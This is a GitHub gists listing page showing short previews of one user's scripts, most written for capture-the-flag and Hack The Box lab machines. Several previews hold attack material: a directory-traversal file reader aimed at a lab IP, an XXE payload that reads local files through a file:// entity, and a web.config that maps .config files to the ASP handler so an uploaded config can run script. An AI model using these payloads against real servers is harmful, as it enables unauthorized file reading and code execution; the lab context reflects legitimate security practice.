Ge0rg3’s gists

Ge0rg3 / 4byte-xor-bruteforce.py

Created April 8, 2019 22:03

Bruteforce 4 byte XOR encryption. Made for HMGCC's BLK_BOX challenge.

	alphabet = [i for i in range(32, 127)]+[10]
	getEnglish = lambda text: list(filter(lambda c: c in alphabet, text))
	isEnglish = lambda text: len(getEnglish(text)) == len(text)

	with open('msg', 'rb') as f:
	encrypted = f.read()
	samples = []
	for i in range(4):
	samples.append([val for index, val in enumerate(encrypted) if index % 4 == i])

Ge0rg3 / Zenith.html

Created February 1, 2019 07:20

Gynvael's Winter GameDev Challenge 2018/19

	<head>
	<title>Game</title>
	<meta charset="UTF-8">
	<style>
	html, body {
	margin: 0px;
	padding: 0px;
	}
	/* https://www.dafont.com/typecast.font?l[]=10&l[]=1 */
	@font-face {

Ge0rg3 / logmonitor.c

Created December 15, 2018 17:29

A redacted file from the Waldo machine on HTB.

	/*******************************************
	*
	*This is an application to print out common log files
	*
	********************************************/

	#include "logMonitor.h"

	void printUsage() {
	printf("Usage: %s [-aAbdDfhklmsw] [--help]\n", PROGRAMNAME);

Ge0rg3 / WaldoDirEnum.py

Created December 15, 2018 17:18

A directory enumeration script for the Waldo HTB machine through LFI.

	import requests as rq
	import sys, os

	url = "http://10.10.10.87/"
	headers={'Content-Type':'application/x-www-form-urlencoded'}
	startdir = "./.../...//.../...//.../...//"
	currentdir = startdir
	print("#########"4+"\n# Directory traversal file reader. #\n# Commands: cd, ls, cat & clear. #\n"+"#########"4)

	while True:

Ge0rg3 / colliding.js

Created December 10, 2018 22:04 — forked from jtsternberg/colliding.js

Detect if two elements are colliding/overlapping

	/**
	* Detects if two elements are colliding
	*
	* Credit goes to BC on Stack Overflow, cleaned up a little bit
	*
	* @link http://stackoverflow.com/questions/5419134/how-to-detect-if-two-divs-touch-with-jquery
	* @param $div1
	* @param $div2
	* @returns {boolean}
	*/

Ge0rg3 / web.config

Last active August 9, 2019 15:27

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

Ge0rg3 / XXEnumerate_2.py

Created October 13, 2018 19:51

An XXE tool written for the DevOops box on HTB.

	import requests as rq
	import sys

	filename = sys.argv[1]
	url = "http://10.10.10.91:5000/upload"

	data = """<?xml version="1.0"?>
	<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://FD" >]>
	<Container>
	<Author></Author>

Ge0rg3 / Clicker-PartF.py

Created October 7, 2018 00:17

Written for my CSAW Red 2018 Clicker Write-up

Ge0rg3 / .UserSearcher.html

Last active October 5, 2018 10:20

An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html

	An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html

	Code spread across the 4 attached files.

Ge0rg3 / Clicker-PartE.py

Created September 30, 2018 20:36

Written for my CSAW Red 2018 Clicker Write-up

	import requests as rq

	for i in range(1,1000):
	headers = {
	"bring_back_random_click":"hhhhhhhhhh",
	}
	req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers)
	if len(req.text) != 243:
	print req.text[:-1]
	break

George O Ge0rg3